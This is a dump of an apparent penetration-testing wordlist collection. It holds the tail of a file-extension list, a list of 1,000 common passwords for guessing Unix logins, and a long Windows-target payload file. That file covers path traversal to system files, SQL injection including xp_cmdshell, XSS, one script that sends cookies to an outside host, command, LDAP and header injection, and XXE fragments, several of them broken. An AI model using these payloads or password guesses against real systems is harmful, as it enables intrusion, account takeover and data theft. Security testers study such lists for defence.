646 | piz
647 | pjx
648 | pka
649 | pkb
650 | pkg
651 | pkh
652 | pks
653 | pkt
654 | pln
655 | plw
656 | pmo
657 | pmr
658 | pnproj
659 | pnpt
660 | pns
661 | pnt
662 | pod
663 | poi
664 | pos
665 | postal
666 | pot
667 | potm
668 | potx
669 | pp2
670 | ppf
671 | pps
672 | ppsx
673 | ppt
674 | pptm
675 | pptx
676 | prc
677 | pre
678 | prf
679 | prj
680 | prm
681 | prs
682 | psa
683 | psf
684 | psm
685 | pst
686 | ptb
687 | ptf
688 | ptk
689 | ptm
690 | ptn
691 | ptt
692 | ptz
693 | pup
694 | puz
695 | pvl
696 | pwa
697 | pwd
698 | pxj
699 | pxl
700 | q07
701 | q08
702 | q09
703 | q3d
704 | qbw
705 | qda
706 | qdat
707 | qdf
708 | qdfm
709 | qel
710 | qfx
711 | qif
712 | qpb
713 | qpf
714 | qph
715 | qpm
716 | qpw
717 | qrp
718 | qsd
719 | r0
720 | r00
721 | r01
722 | r02
723 | r03
724 | r1
725 | r2
726 | r30
727 | ral
728 | rar
729 | rbt
730 | rcd
731 | rcg
732 | rdb
733 | rdf
734 | rdx
735 | ref
736 | ret
737 | rev
738 | rf1
739 | rfa
740 | rfo
741 | rge
742 | rgn
743 | rgo
744 | rk
745 | rmuf
746 | rnc
747 | rnq
748 | rod
749 | rog
750 | roi
751 | rou
752 | rp9
753 | rpm
754 | rpp
755 | rpt
756 | rrt
757 | rsc
758 | rsd
759 | rsw
760 | rte
761 | rvt
762 | rwg
763 | rz
764 | rzb
765 | rzs
766 | s00
767 | s01
768 | s02
769 | s7z
770 | s85
771 | saf
772 | sam07
773 | sar
774 | sav
775 | sbd
776 | sbf
777 | sbq
778 | sbt
779 | sca
780 | scf
781 | sch
782 | sdb
783 | sdc
784 | sdf
785 | sdn
786 | sdp
787 | sdq
788 | sds
789 | sea
790 | sen
791 | seo
792 | seq
793 | ser
794 | sfs
795 | sfx
796 | sgml
797 | sgn
798 | sh
799 | shar
800 | shk
801 | shp
802 | shr
803 | shs
804 | shx
805 | sit
806 | sitx
807 | skc
808 | skv
809 | skx
810 | sle
811 | slk
812 | slp
813 | snapfireshow
814 | sonic
815 | soundpack
816 | spo
817 | sps
818 | spt
819 | spub
820 | spv
821 | sq
822 | sqd
823 | sql
824 | sqlite
825 | sqr
826 | sqx
827 | sqz
828 | sta
829 | stc
830 | stf
831 | stk
832 | stl
833 | stm
834 | stp
835 | str
836 | stt
837 | stw
838 | styk
839 | stykz
840 | swk
841 | sxc
842 | sxi
843 | sy3
844 | t01
845 | t02
846 | t03
847 | t04
848 | t05
849 | t06
850 | t07
851 | t08
852 | t09
853 | t2
854 | t3001
855 | tar
856 | tar.gz
857 | tar.xz
858 | tax2008
859 | tax2009
860 | taz
861 | tb
862 | tbk
863 | tbl
864 | tbz
865 | tbz2
866 | tcc
867 | tcx
868 | tda
869 | tdl
870 | tdm
871 | tdt
872 | te
873 | te3
874 | teacher
875 | tef
876 | tet
877 | tfa
878 | tfd
879 | tfrd
880 | tg
881 | tgz
882 | tjp
883 | tk3
884 | tkfl
885 | tlz
886 | tlzma
887 | tmw
888 | tol
889 | topc
890 | tpb
891 | tps
892 | tr3
893 | tra
894 | trd
895 | trk
896 | trs
897 | trx
898 | tst
899 | tsv
900 | ttk
901 | txa
902 | txd
903 | txf
904 | txz
905 | tz
906 | uc2
907 | uccapilog
908 | ud
909 | udb
910 | udeb
911 | uds
912 | uha
913 | ulf
914 | ulz
915 | update
916 | upoi
917 | usr
918 | uvf
919 | uwl
920 | val
921 | vbpf1
922 | vcd
923 | vce
924 | vcf
925 | vcs
926 | vdb
927 | vdx
928 | vem
929 | vfs
930 | vi
931 | vip
932 | vle
933 | vlg
934 | vmt
935 | voi
936 | vok
937 | vrd
938 | vscontent
939 | vsi
940 | vsx
941 | vtx
942 | vxml
943 | w02
944 | wab
945 | wad
946 | war
947 | wb1
948 | wb2
949 | wb3
950 | wdb
951 | wdq
952 | wea
953 | wfd
954 | wfm
955 | wgp
956 | wgt
957 | windowslivecontact
958 | wjr
959 | wk1
960 | wk2
961 | wk3
962 | wk4
963 | wk5
964 | wke
965 | wki
966 | wks
967 | wku
968 | wlmp
969 | wmdb
970 | wor
971 | wot
972 | wpc
973 | wpf
974 | wpo
975 | wq1
976 | wq2
977 | wtb
978 | wtr
979 | xbk
980 | xdb
981 | xdp
982 | xds
983 | xef
984 | xem
985 | xez
986 | xfd
987 | xfo
988 | xft
989 | xl
990 | xlc
991 | xlgc
992 | xlr
993 | xls
994 | xlsb
995 | xlsm
996 | xlsx
997 | xlt
998 | xltm
999 | xltx
1000 | xlw
1001 | xmcd
1002 | xmcdz
1003 | xml
1004 | xmlper
1005 | xmpz
1006 | xpg
1007 | xpi
1008 | xpj
1009 | xpm
1010 | xpt
1011 | xrp
1012 | xsl
1013 | xslt
1014 | xsn
1015 | xtm
1016 | xtp
1017 | xx
1018 | xxd
1019 | xz
1020 | y
1021 | yam
1022 | yz
1023 | z
1024 | z01
1025 | z02
1026 | z03
1027 | z04
1028 | zap
1029 | zdb
1030 | zdc
1031 | zfsendtotarget
1032 | zip
1033 | zipx
1034 | zix
1035 | zmc
1036 | zoo
1037 | zpi
1038 | zpl
1039 | zz
1040 |
--------------------------------------------------------------------------------
/wordlists-user-passwd/unix-os/unix_passwords.txt:
--------------------------------------------------------------------------------
1 | 123456
2 | 12345
3 | 123456789
4 | password
5 | iloveyou
6 | princess
7 | 1234567
8 | 12345678
9 | abc123
10 | nicole
11 | daniel
12 | babygirl
13 | monkey
14 | lovely
15 | jessica
16 | 654321
17 | michael
18 | ashley
19 | qwerty
20 | 111111
21 | iloveu
22 | 000000
23 | michelle
24 | tigger
25 | sunshine
26 | chocolate
27 | password1
28 | soccer
29 | anthony
30 | friends
31 | butterfly
32 | purple
33 | angel
34 | jordan
35 | liverpool
36 | justin
37 | loveme
38 | fuckyou
39 | 123123
40 | football
41 | secret
42 | andrea
43 | carlos
44 | jennifer
45 | joshua
46 | bubbles
47 | 1234567890
48 | superman
49 | hannah
50 | amanda
51 | loveyou
52 | pretty
53 | basketball
54 | andrew
55 | angels
56 | tweety
57 | flower
58 | playboy
59 | hello
60 | elizabeth
61 | hottie
62 | tinkerbell
63 | charlie
64 | samantha
65 | barbie
66 | chelsea
67 | lovers
68 | teamo
69 | jasmine
70 | brandon
71 | 666666
72 | shadow
73 | melissa
74 | eminem
75 | matthew
76 | robert
77 | danielle
78 | forever
79 | family
80 | jonathan
81 | 987654321
82 | computer
83 | whatever
84 | dragon
85 | vanessa
86 | cookie
87 | naruto
88 | summer
89 | sweety
90 | spongebob
91 | joseph
92 | junior
93 | softball
94 | taylor
95 | yellow
96 | daniela
97 | lauren
98 | mickey
99 | princesa
100 | alexandra
101 | alexis
102 | jesus
103 | estrella
104 | miguel
105 | william
106 | thomas
107 | beautiful
108 | mylove
109 | angela
110 | poohbear
111 | patrick
112 | iloveme
113 | sakura
114 | adrian
115 | alexander
116 | destiny
117 | christian
118 | 121212
119 | sayang
120 | america
121 | dancer
122 | monica
123 | richard
124 | 112233
125 | princess1
126 | 555555
127 | diamond
128 | carolina
129 | steven
130 | rangers
131 | louise
132 | orange
133 | 789456
134 | 999999
135 | shorty
136 | 11111
137 | nathan
138 | snoopy
139 | gabriel
140 | hunter
141 | cherry
142 | killer
143 | sandra
144 | alejandro
145 | buster
146 | george
147 | brittany
148 | alejandra
149 | patricia
150 | rachel
151 | tequiero
152 | 7777777
153 | cheese
154 | 159753
155 | arsenal
156 | dolphin
157 | antonio
158 | heather
159 | david
160 | ginger
161 | stephanie
162 | peanut
163 | blink182
164 | sweetie
165 | 222222
166 | beauty
167 | 987654
168 | victoria
169 | honey
170 | 00000
171 | fernando
172 | pokemon
173 | maggie
174 | corazon
175 | chicken
176 | pepper
177 | cristina
178 | rainbow
179 | kisses
180 | manuel
181 | myspace
182 | rebelde
183 | angel1
184 | ricardo
185 | babygurl
186 | heaven
187 | 55555
188 | baseball
189 | martin
190 | greenday
191 | november
192 | alyssa
193 | madison
194 | mother
195 | 123321
196 | 123abc
197 | mahalkita
198 | batman
199 | september
200 | december
201 | morgan
202 | mariposa
203 | maria
204 | gabriela
205 | iloveyou2
206 | bailey
207 | jeremy
208 | pamela
209 | kimberly
210 | gemini
211 | shannon
212 | pictures
213 | asshole
214 | sophie
215 | jessie
216 | hellokitty
217 | claudia
218 | babygirl1
219 | angelica
220 | austin
221 | mahalko
222 | victor
223 | horses
224 | tiffany
225 | mariana
226 | eduardo
227 | andres
228 | courtney
229 | booboo
230 | kissme
231 | harley
232 | ronaldo
233 | iloveyou1
234 | precious
235 | october
236 | inuyasha
237 | peaches
238 | veronica
239 | chris
240 | 888888
241 | adriana
242 | cutie
243 | james
244 | banana
245 | prince
246 | friend
247 | jesus1
248 | crystal
249 | celtic
250 | zxcvbnm
251 | edward
252 | oliver
253 | diana
254 | samsung
255 | freedom
256 | angelo
257 | kenneth
258 | master
259 | scooby
260 | carmen
261 | 456789
262 | sebastian
263 | rebecca
264 | jackie
265 | spiderman
266 | christopher
267 | karina
268 | johnny
269 | hotmail
270 | 0123456789
271 | school
272 | barcelona
273 | august
274 | orlando
275 | samuel
276 | cameron
277 | slipknot
278 | cutiepie
279 | monkey1
280 | 50cent
281 | bonita
282 | kevin
283 | bitch
284 | maganda
285 | babyboy
286 | casper
287 | brenda
288 | adidas
289 | kitten
290 | karen
291 | mustang
292 | isabel
293 | natalie
294 | cuteako
295 | javier
296 | 789456123
297 | 123654
298 | sarah
299 | bowwow
300 | portugal
301 | laura
302 | 777777
303 | marvin
304 | denise
305 | tigers
306 | volleyball
307 | jasper
308 | january
309 | fuckoff
310 | alicia
311 | nicholas
312 | flowers
313 | cristian
314 | tintin
315 | bianca
316 | chrisbrown
317 | chester
318 | 101010
319 | smokey
320 | silver
321 | internet
322 | sweet
323 | strawberry
324 | garfield
325 | dennis
326 | panget
327 | francis
328 | cassie
329 | benfica
330 | love123
331 | 696969
332 | asdfgh
333 | lollipop
334 | olivia
335 | cancer
336 | camila
337 | qwertyuiop
338 | superstar
339 | harrypotter
340 | ihateyou
341 | charles
342 | monique
343 | midnight
344 | vincent
345 | christine
346 | apples
347 | scorpio
348 | jordan23
349 | lorena
350 | andreea
351 | mercedes
352 | katherine
353 | charmed
354 | abigail
355 | rafael
356 | icecream
357 | mexico
358 | brianna
359 | nirvana
360 | aaliyah
361 | pookie
362 | johncena
363 | lovelove
364 | fucker
365 | abcdef
366 | benjamin
367 | 131313
368 | gangsta
369 | brooke
370 | 333333
371 | hiphop
372 | aaaaaa
373 | mybaby
374 | sergio
375 | welcome
376 | metallica
377 | julian
378 | travis
379 | myspace1
380 | babyblue
381 | sabrina
382 | michael1
383 | jeffrey
384 | stephen
385 | love
386 | dakota
387 | catherine
388 | badboy
389 | fernanda
390 | westlife
391 | blondie
392 | sasuke
393 | smiley
394 | jackson
395 | simple
396 | melanie
397 | steaua
398 | dolphins
399 | roberto
400 | fluffy
401 | teresa
402 | piglet
403 | ronald
404 | slideshow
405 | asdfghjkl
406 | minnie
407 | newyork
408 | jason
409 | raymond
410 | santiago
411 | jayson
412 | 88888888
413 | 5201314
414 | jerome
415 | gandako
416 | muffin
417 | gatita
418 | babyko
419 | 246810
420 | sweetheart
421 | chivas
422 | ladybug
423 | kitty
424 | popcorn
425 | alberto
426 | valeria
427 | cookies
428 | leslie
429 | jenny
430 | nicole1
431 | 12345678910
432 | leonardo
433 | jayjay
434 | liliana
435 | dexter
436 | sexygirl
437 | 232323
438 | amores
439 | christ
440 | babydoll
441 | anthony1
442 | marcus
443 | bitch1
444 | fatima
445 | miamor
446 | lover
447 | chris1
448 | single
449 | eeyore
450 | lalala
451 | 252525
452 | scooter
453 | natasha
454 | skittles
455 | brooklyn
456 | colombia
457 | 159357
458 | teddybear
459 | winnie
460 | happy
461 | manutd
462 | 123456a
463 | britney
464 | katrina
465 | christina
466 | pasaway
467 | cocacola
468 | mahal
469 | grace
470 | linda
471 | albert
472 | tatiana
473 | london
474 | cantik
475 | 0123456
476 | lakers
477 | marie
478 | teiubesc
479 | 147258369
480 | charlotte
481 | natalia
482 | francisco
483 | amorcito
484 | smile
485 | paola
486 | angelito
487 | manchester
488 | hahaha
489 | elephant
490 | mommy1
491 | shelby
492 | 147258
493 | kelsey
494 | genesis
495 | amigos
496 | snickers
497 | xavier
498 | turtle
499 | marlon
500 | linkinpark
501 | claire
502 | stupid
503 | 147852
504 | marina
505 | garcia
506 | fuckyou1
507 | diego
508 | brandy
509 | letmein
510 | hockey
511 | 444444
512 | sharon
513 | bonnie
514 | spider
515 | iverson
516 | andrei
517 | justine
518 | frankie
519 | pimpin
520 | disney
521 | rabbit
522 | 54321
523 | fashion
524 | soccer1
525 | red123
526 | bestfriend
527 | england
528 | hermosa
529 | 456123
530 | qazwsx
531 | bandit
532 | danny
533 | allison
534 | emily
535 | 102030
536 | lucky1
537 | sporting
538 | miranda
539 | dallas
540 | hearts
541 | camille
542 | wilson
543 | potter
544 | pumpkin
545 | iloveu2
546 | number1
547 | katie
548 | guitar
549 | 212121
550 | truelove
551 | jayden
552 | savannah
553 | hottie1
554 | phoenix
555 | monster
556 | player
557 | ganda
558 | people
559 | scotland
560 | nelson
561 | jasmin
562 | timothy
563 | onelove
564 | ilovehim
565 | shakira
566 | estrellita
567 | bubble
568 | smiles
569 | brandon1
570 | sparky
571 | barney
572 | sweets
573 | parola
574 | evelyn
575 | familia
576 | love12
577 | nikki
578 | motorola
579 | florida
580 | omarion
581 | monkeys
582 | loverboy
583 | elijah
584 | joanna
585 | canada
586 | ronnie
587 | mamita
588 | emmanuel
589 | thunder
590 | 999999999
591 | broken
592 | rodrigo
593 | maryjane
594 | westside
595 | california
596 | lucky
597 | mauricio
598 | yankees
599 | jackass
600 | jamaica
601 | justin1
602 | amigas
603 | preciosa
604 | shopping
605 | flores
606 | mariah
607 | matrix
608 | isabella
609 | tennis
610 | trinity
611 | jorge
612 | sunflower
613 | kathleen
614 | bradley
615 | cupcake
616 | hector
617 | martinez
618 | elaine
619 | robbie
620 | friendster
621 | cheche
622 | gracie
623 | connor
624 | hello1
625 | valentina
626 | melody
627 | darling
628 | sammy
629 | jamie
630 | santos
631 | abcdefg
632 | joanne
633 | candy
634 | fuckyou2
635 | loser
636 | dominic
637 | pebbles
638 | sunshine1
639 | swimming
640 | millie
641 | loving
642 | gangster
643 | blessed
644 | compaq
645 | taurus
646 | gloria
647 | tyler
648 | aaron
649 | darkangel
650 | kitkat
651 | megan
652 | dreams
653 | sweetpea
654 | bettyboop
655 | jessica1
656 | cynthia
657 | cheyenne
658 | ferrari
659 | dustin
660 | iubire
661 | a123456
662 | snowball
663 | purple1
664 | violet
665 | darren
666 | starwars
667 | bestfriends
668 | inlove
669 | kelly
670 | batista
671 | karla
672 | sophia
673 | chacha
674 | biteme
675 | marian
676 | sydney
677 | sexyme
678 | pogiako
679 | gerald
680 | jordan1
681 | 010203
682 | daddy1
683 | zachary
684 | daddysgirl
685 | billabong
686 | carebear
687 | froggy
688 | pinky
689 | erika
690 | oscar
691 | skater
692 | raiders
693 | nenita
694 | tigger1
695 | ashley1
696 | charlie1
697 | gatito
698 | lokita
699 | maldita
700 | buttercup
701 | nichole
702 | bambam
703 | nothing
704 | glitter
705 | bella
706 | amber
707 | apple
708 | 123789
709 | sister
710 | zacefron
711 | tokiohotel
712 | loveya
713 | lindsey
714 | money
715 | lovebug
716 | bubblegum
717 | marissa
718 | dreamer
719 | darkness
720 | cecilia
721 | lollypop
722 | nicolas
723 | google
724 | lindsay
725 | cooper
726 | passion
727 | kristine
728 | green
729 | puppies
730 | ariana
731 | fuckme
732 | chubby
733 | raquel
734 | lonely
735 | anderson
736 | sammie
737 | sexybitch
738 | mario
739 | butter
740 | willow
741 | roxana
742 | mememe
743 | caroline
744 | susana
745 | kristen
746 | baller
747 | hotstuff
748 | carter
749 | stacey
750 | babylove
751 | angelina
752 | miller
753 | scorpion
754 | sierra
755 | playgirl
756 | sweet16
757 | 012345
758 | bhebhe
759 | gustavo
760 | marcos
761 | chance
762 | 123qwe
763 | kayla
764 | james1
765 | football1
766 | eagles
767 | loveme1
768 | milagros
769 | stella
770 | lilmama
771 | beyonce
772 | lovely1
773 | daddy
774 | catdog
775 | armando
776 | margarita
777 | 151515
778 | loves
779 | lolita
780 | 202020
781 | gerard
782 | undertaker
783 | amistad
784 | williams
785 | qwerty1
786 | freddy
787 | capricorn
788 | caitlin
789 | bryan
790 | delfin
791 | dance
792 | cheerleader
793 | password2
794 | PASSWORD
795 | martha
796 | lizzie
797 | georgia
798 | matthew1
799 | enrique
800 | zxcvbn
801 | badgirl
802 | andrew1
803 | 141414
804 | 11111111
805 | dancing
806 | cuteme
807 | booger
808 | amelia
809 | vampire
810 | skyline
811 | chiquita
812 | angeles
813 | scoobydoo
814 | janine
815 | tamara
816 | carlitos
817 | money1
818 | sheila
819 | justme
820 | ireland
821 | kittycat
822 | hotdog
823 | yamaha
824 | tristan
825 | harvey
826 | israel
827 | legolas
828 | michelle1
829 | maddie
830 | angie
831 | cinderella
832 | jesuschrist
833 | lester
834 | ashton
835 | ilovejesus
836 | tazmania
837 | remember
838 | xxxxxx
839 | tekiero
840 | thebest
841 | princesita
842 | lucky7
843 | jesucristo
844 | peewee
845 | paloma
846 | buddy1
847 | deedee
848 | miriam
849 | april
850 | patches
851 | regina
852 | janice
853 | cowboys
854 | myself
855 | lipgloss
856 | jazmin
857 | rosita
858 | happy1
859 | felipe
860 | chichi
861 | pangit
862 | mierda
863 | genius
864 | 741852963
865 | hernandez
866 | awesome
867 | walter
868 | tinker
869 | arturo
870 | silvia
871 | melvin
872 | celeste
873 | pussycat
874 | gorgeous
875 | david1
876 | molly
877 | honeyko
878 | mylife
879 | animal
880 | penguin
881 | babyboo
882 | loveu
883 | simpsons
884 | lupita
885 | boomer
886 | panthers
887 | hollywood
888 | alfredo
889 | musica
890 | johnson
891 | ilovegod
892 | hawaii
893 | sparkle
894 | kristina
895 | sexymama
896 | crazy
897 | valerie
898 | spencer
899 | scarface
900 | hardcore
901 | 098765
902 | 00000000
903 | winter
904 | hailey
905 | trixie
906 | hayden
907 | micheal
908 | wesley
909 | 242424
910 | 0987654321
911 | marisol
912 | nikita
913 | daisy
914 | jeremiah
915 | pineapple
916 | mhine
917 | isaiah
918 | christmas
919 | cesar
920 | lolipop
921 | butterfly1
922 | chloe
923 | lawrence
924 | xbox360
925 | sheena
926 | murphy
927 | madalina
928 | anamaria
929 | gateway
930 | debbie
931 | yourmom
932 | blonde
933 | jasmine1
934 | please
935 | bubbles1
936 | jimmy
937 | beatriz
938 | poopoo
939 | diamonds
940 | whitney
941 | friendship
942 | sweetness
943 | pauline
944 | desiree
945 | trouble
946 | 741852
947 | united
948 | marley
949 | brian
950 | barbara
951 | hannah1
952 | bananas
953 | julius
954 | leanne
955 | sandy
956 | marie1
957 | anita
958 | lover1
959 | chicago
960 | twinkle
961 | pantera
962 | february
963 | birthday
964 | shadow1
965 | qwert
966 | bebita
967 | 87654321
968 | twilight
969 | imissyou
970 | pollito
971 | ashlee
972 | tucker
973 | cookie1
974 | shelly
975 | catalina
976 | 147852369
977 | beckham
978 | simone
979 | nursing
980 | iloveyou!
981 | eugene
982 | torres
983 | damian
984 | 123123123
985 | joshua1
986 | bobby
987 | babyface
988 | andre
989 | donald
990 | daniel1
991 | panther
992 | dinamo
993 | mommy
994 | juliana
995 | cassandra
996 | trustno1
997 | sexylady
998 | 14344
999 | autumn
1000 | mendoza
1001 |
--------------------------------------------------------------------------------
/常用攻击载荷/all-attacks-win.txt:
--------------------------------------------------------------------------------
1 | # a wide sample of malicious input for windows targets
2 | A
3 | TRUE
4 | FALSE
5 | 0
6 | 00
7 | 1
8 | -1
9 | 1.0
10 | -1.0
11 | 2
12 | -2
13 | -20
14 | 65536
15 | 268435455
16 | -268435455
17 | 2147483647
18 | 0xfffffff
19 | NULL
20 | null
21 | \0
22 | \00
23 | < script > < / script>
24 | %0a
25 | %00
26 | +%00
27 | \0
28 | \0\0
29 | \0\0\0
30 | \00
31 | \00\00
32 | \00\00\00
33 | $null
34 | $NULL
35 | `dir`
36 | \nnetstat -a%\n
37 | \"blah
38 | |dir|
39 | ";id"
40 | dir%00
41 | dir%00|
42 | |dir
43 | |dir|
44 | |/bin/ls -al
45 | ?x=
46 | ?x="
47 | ?x=|
48 | ?x=>
49 | /boot.ini
50 | ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
51 | ../../boot.ini
52 | /../../../../../../../../%2A
53 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
54 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
55 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
56 | ../../../../../../../../conf/server.xml
57 | C:/inetpub/wwwroot/global.asa
58 | C:\inetpub\wwwroot\global.asa
59 | C:/boot.ini
60 | C:\boot.ini
61 | ../../../../../../../../../../../../localstart.asp%00
62 | ../../../../../../../../../../../../localstart.asp
63 | ../../../../../../../../../../../../boot.ini%00
64 | ../../../../../../../../../../../../boot.ini
65 | /./././././././././././boot.ini
66 | /../../../../../../../../../../../boot.ini%00
67 | /../../../../../../../../../../../boot.ini
68 | /..\../..\../..\../..\../..\../..\../boot.ini
69 | /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
70 | \..\..\..\..\..\..\..\..\..\..\boot.ini
71 | ..\..\..\..\..\..\..\..\..\..\boot.ini%00
72 | ..\..\..\..\..\..\..\..\..\..\boot.ini
73 | /../../../../../../../../../../../boot.ini%00.html
74 | /../../../../../../../../../../../boot.ini%00.jpg
75 | /.../.../.../.../.../
76 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
77 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
78 | %0d%0aX-Injection-Header:%20AttackValue
79 | !@#0%^#0##018387@#0^^**(()
80 | %01%02%03%04%0a%0d%0aADSF
81 | /,%ENV,/
82 | <!--#exec%20cmd="dir"-->
83 | <!--#exec%20cmd="dir"-->
84 | %
85 | #
86 | *
87 | }
88 | ;
89 | /
90 | \
91 | \\
92 | \\/
93 | \\\\*
94 | \\\\?\\
95 | <
96 | <
97 | <
98 | <
99 | <
100 | <<
101 | <<<
102 | |
103 | ||
104 | `
105 | -
106 | --
107 | *|
108 | ^'
109 | \'
110 | /'
111 | @'
112 | (')
113 | {'}
114 | [']
115 | *'
116 | #'
117 | !'
118 | !@#$%%^#$%#$@#$%$$@#$%^^**(()
119 | %01%02%03%04%0a%0d%0aADSF
120 | \t
121 | "\t"
122 |
123 |
124 |
125 |
126 | #xD
127 | #xA
128 | #xD#xA
129 | #xA#xD
130 | /%00/
131 | %00/
132 | %00
133 | xxxyyy
235 | ">
237 | <
238 |
239 | '>
240 | '>
241 | \";alert('XSS');//
242 | %3cscript%3ealert("XSS");%3c/script%3e
243 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
244 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
245 | <script>alert(document.cookie);
246 | <script>alert(document.cookie);<script>alert
247 |
248 |
249 |
250 |
252 |
253 |
254 | ![](`javascript:alert("'XSS'")`)
255 | ![]() ">
256 |
257 |
258 |
259 |
260 |
261 |
262 |
263 | ![]()
264 | ![]()
265 |
266 |
267 |
268 |
269 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
270 | ">
271 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
272 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
273 | '';!--"=&{()}
274 |
275 | '
276 | "
277 | #
278 | -
279 | --
280 | ' --
281 | --';
282 | ' ;
283 | = '
284 | = ;
285 | = --
286 | \x23
287 | \x27
288 | \x3D \x3B'
289 | \x3D \x27
290 | \x27\x4F\x52 SELECT *
291 | \x27\x6F\x72 SELECT *
292 | 'or select *
293 | admin'--
294 | ';shutdown--
295 | <>"'%;)(&+
296 | ' or ''='
297 | ' or 'x'='x
298 | " or "x"="x
299 | ') or ('x'='x
300 | 0 or 1=1
301 | ' or 0=0 --
302 | " or 0=0 --
303 | or 0=0 --
304 | ' or 0=0 #
305 | " or 0=0 #
306 | or 0=0 #
307 | ' or 1=1--
308 | " or 1=1--
309 | ' or '1'='1'--
310 | "' or 1 --'"
311 | or 1=1--
312 | or%201=1
313 | or%201=1 --
314 | ' or 1=1 or ''='
315 | " or 1=1 or ""="
316 | ' or a=a--
317 | " or "a"="a
318 | ') or ('a'='a
319 | ") or ("a"="a
320 | hi" or "a"="a
321 | hi" or 1=1 --
322 | hi' or 1=1 --
323 | hi' or 'a'='a
324 | hi') or ('a'='a
325 | hi") or ("a"="a
326 | 'hi' or 'x'='x';
327 | @variable
328 | ,@variable
329 | PRINT
330 | PRINT @@variable
331 | select
332 | insert
333 | as
334 | or
335 | procedure
336 | limit
337 | order by
338 | asc
339 | desc
340 | delete
341 | update
342 | distinct
343 | having
344 | truncate
345 | replace
346 | like
347 | handler
348 | bfilename
349 | ' or username like '%
350 | ' or uname like '%
351 | ' or userid like '%
352 | ' or uid like '%
353 | ' or user like '%
354 | exec xp
355 | exec sp
356 | '; exec master..xp_cmdshell
357 | '; exec xp_regread
358 | t'exec master..xp_cmdshell 'nslookup www.google.com'--
359 | --sp_password
360 | \x27UNION SELECT
361 | ' UNION SELECT
362 | ' UNION ALL SELECT
363 | ' or (EXISTS)
364 | ' (select top 1
365 | '||UTL_HTTP.REQUEST
366 | 1;SELECT%20*
367 | to_timestamp_tz
368 | tz_offset
369 | <>"'%;)(&+
370 | '%20or%201=1
371 | %27%20or%201=1
372 | %20$(sleep%2050)
373 | %20'sleep%2050'
374 | char%4039%41%2b%40SELECT
375 | '%20OR
376 | 'sqlattempt1
377 | (sqlattempt2)
378 | |
379 | %7C
380 | *|
381 | %2A%7C
382 | *(|(mail=*))
383 | %2A%28%7C%28mail%3D%2A%29%29
384 | *(|(objectclass=*))
385 | %2A%28%7C%28objectclass%3D%2A%29%29
386 | (
387 | %28
388 | )
389 | %29
390 | &
391 | %26
392 | !
393 | %21
394 | ' or 1=1 or ''='
395 | ' or ''='
396 | x' or 1=1 or 'x'='y
397 | /
398 | //
399 | //*
400 | */*
401 | @*
402 | count(/child::node())
403 | x' or name()='username' or 'x'='y
404 | ','')); phpinfo(); exit;/*
405 | var n=0;while(true){n++;}]]>
406 | SCRIPT]]>alert('XSS');/SCRIPT]]>
407 | SCRIPT]]>alert('XSS');/SCRIPT]]>
408 |
409 | ]>&xxe;
410 | ]>&xxe;
411 | ]>&xxe;
412 | ]>&xxe;
413 | ]]>
414 | <IMG SRC="javascript:alert('XSS')">
415 |
416 | XSS
417 |
418 | '
419 | '--
420 | ' or 1=1--
421 | 1 or 1=1--
422 | ' or 1 in (@@version)--
423 | 1 or 1 in (@@version)--
424 | '; waitfor delay '0:30:0'--
425 | 1; waitfor delay '0:30:0'--
426 | '||Utl_Http.request('http://') from dual--
427 | 1||Utl_Http.request('http://') from dual--
428 | xsstest
429 | xsstest%00"<>'
430 |
431 |
432 | ))))))))))
433 | ../../../../../../../../../../boot.ini
434 | ..\..\..\..\..\..\..\..\..\..\boot.ini
435 | ../../../../../../../../../../windows/win.ini
436 | ..\..\..\..\..\..\..\..\..\..\windows\win.ini
437 | || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
438 | | ping -i 30 127.0.0.1 |
439 | | ping -n 30 127.0.0.1 |
440 | & ping -i 30 127.0.0.1 &
441 | & ping -n 30 127.0.0.1 &
442 | ; ping 127.0.0.1 ;
443 | %0a ping -i 30 127.0.0.1 %0a
444 | `ping 127.0.0.1`
445 | ;echo 111111
446 | echo 111111
447 | response.write 111111
448 | :response.write 111111
449 | http:///
450 | %0aCc:
451 | %0d%0aCc:
452 | %0aBcc:
453 | %0d%0aBcc:
454 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
455 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
456 | # known cross platform source Code, file disclosure attack patterns - append after file or dir path
457 | %70
458 | .%E2%73%70
459 | %2e0
460 | %2e
461 | .
462 | \
463 | ?*
464 | %20
465 | %00
466 | %2f
467 | %5c
468 | count(/child::node())
469 | x' or name()='username' or 'x'='y
470 | var n=0;while(true){n++;}]]>
471 | SCRIPT]]>alert('XSS');/SCRIPT]]>
472 | "SCRIPT]]>alert('XSS');/SCRIPT]]>"
473 | ""
474 | "]>&xxe;"
475 | "]>&xxe;"
476 | "]>&xxe;"
477 | "]>&xxe;"
